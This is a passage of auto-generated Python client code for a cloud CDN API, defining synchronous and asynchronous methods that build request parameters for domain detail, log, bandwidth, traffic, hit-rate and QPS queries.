) -> cdn_20141111_models.AddCdnDomainResponse:
runtime = util_models.RuntimeOptions()
return self.add_cdn_domain_with_options(request, runtime)
async def add_cdn_domain_async(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
) -> cdn_20141111_models.AddCdnDomainResponse:
runtime = util_models.RuntimeOptions()
return await self.add_cdn_domain_with_options_async(request, runtime)
def describe_cdn_domain_detail_with_options(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainDetail',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainDetailResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_domain_detail_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainDetail',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainDetailResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_domain_detail(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_domain_detail_with_options(request, runtime)
async def describe_cdn_domain_detail_async(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_domain_detail_with_options_async(request, runtime)
def describe_cdn_domain_logs_with_options(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.log_day):
query['LogDay'] = request.log_day
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainLogs',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainLogsResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_domain_logs_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.log_day):
query['LogDay'] = request.log_day
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainLogs',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainLogsResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_domain_logs(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_domain_logs_with_options(request, runtime)
async def describe_cdn_domain_logs_async(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_domain_logs_with_options_async(request, runtime)
def describe_cdn_service_with_options(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnServiceResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_service_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnServiceResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_service(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_service_with_options(request, runtime)
async def describe_cdn_service_async(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_service_with_options_async(request, runtime)
def describe_domain_bps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_bps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_bps_data(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_bps_data_with_options(request, runtime)
async def describe_domain_bps_data_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_bps_data_with_options_async(request, runtime)
def describe_domain_bps_data_by_time_stamp_with_options(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.isp_names):
query['IspNames'] = request.isp_names
if not UtilClient.is_unset(request.location_names):
query['LocationNames'] = request.location_names
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.time_point):
query['TimePoint'] = request.time_point
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsDataByTimeStamp',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_bps_data_by_time_stamp_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.isp_names):
query['IspNames'] = request.isp_names
if not UtilClient.is_unset(request.location_names):
query['LocationNames'] = request.location_names
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.time_point):
query['TimePoint'] = request.time_point
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsDataByTimeStamp',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_bps_data_by_time_stamp(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_bps_data_by_time_stamp_with_options(request, runtime)
async def describe_domain_bps_data_by_time_stamp_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_bps_data_by_time_stamp_with_options_async(request, runtime)
def describe_domain_file_size_proportion_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFileSizeProportionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_file_size_proportion_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFileSizeProportionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_file_size_proportion_data(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_file_size_proportion_data_with_options(request, runtime)
async def describe_domain_file_size_proportion_data_async(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_file_size_proportion_data_with_options_async(request, runtime)
def describe_domain_flow_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFlowDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_flow_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFlowDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_flow_data(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_flow_data_with_options(request, runtime)
async def describe_domain_flow_data_async(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_flow_data_with_options_async(request, runtime)
def describe_domain_hit_rate_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHitRateDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_hit_rate_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHitRateDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_hit_rate_data(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_hit_rate_data_with_options(request, runtime)
async def describe_domain_hit_rate_data_async(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_hit_rate_data_with_options_async(request, runtime)
def describe_domain_http_code_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHttpCodeData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHttpCodeDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_http_code_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHttpCodeData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHttpCodeDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_http_code_data(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_http_code_data_with_options(request, runtime)
async def describe_domain_http_code_data_async(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_http_code_data_with_options_async(request, runtime)
def describe_domain_ispdata_with_options(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainISPData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainISPDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_ispdata_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainISPData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainISPDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_ispdata(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_ispdata_with_options(request, runtime)
async def describe_domain_ispdata_async(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_ispdata_with_options_async(request, runtime)
def describe_domain_qps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainQpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainQpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_qps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainQpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainQpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_qps_data(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_qps_data_with_options(request, runtime)
async def describe_domain_qps_data_async(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_qps_data_with_options_async(request, runtime)
def describe_domain_region_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
runtime: util_models.RuntimeOptions,
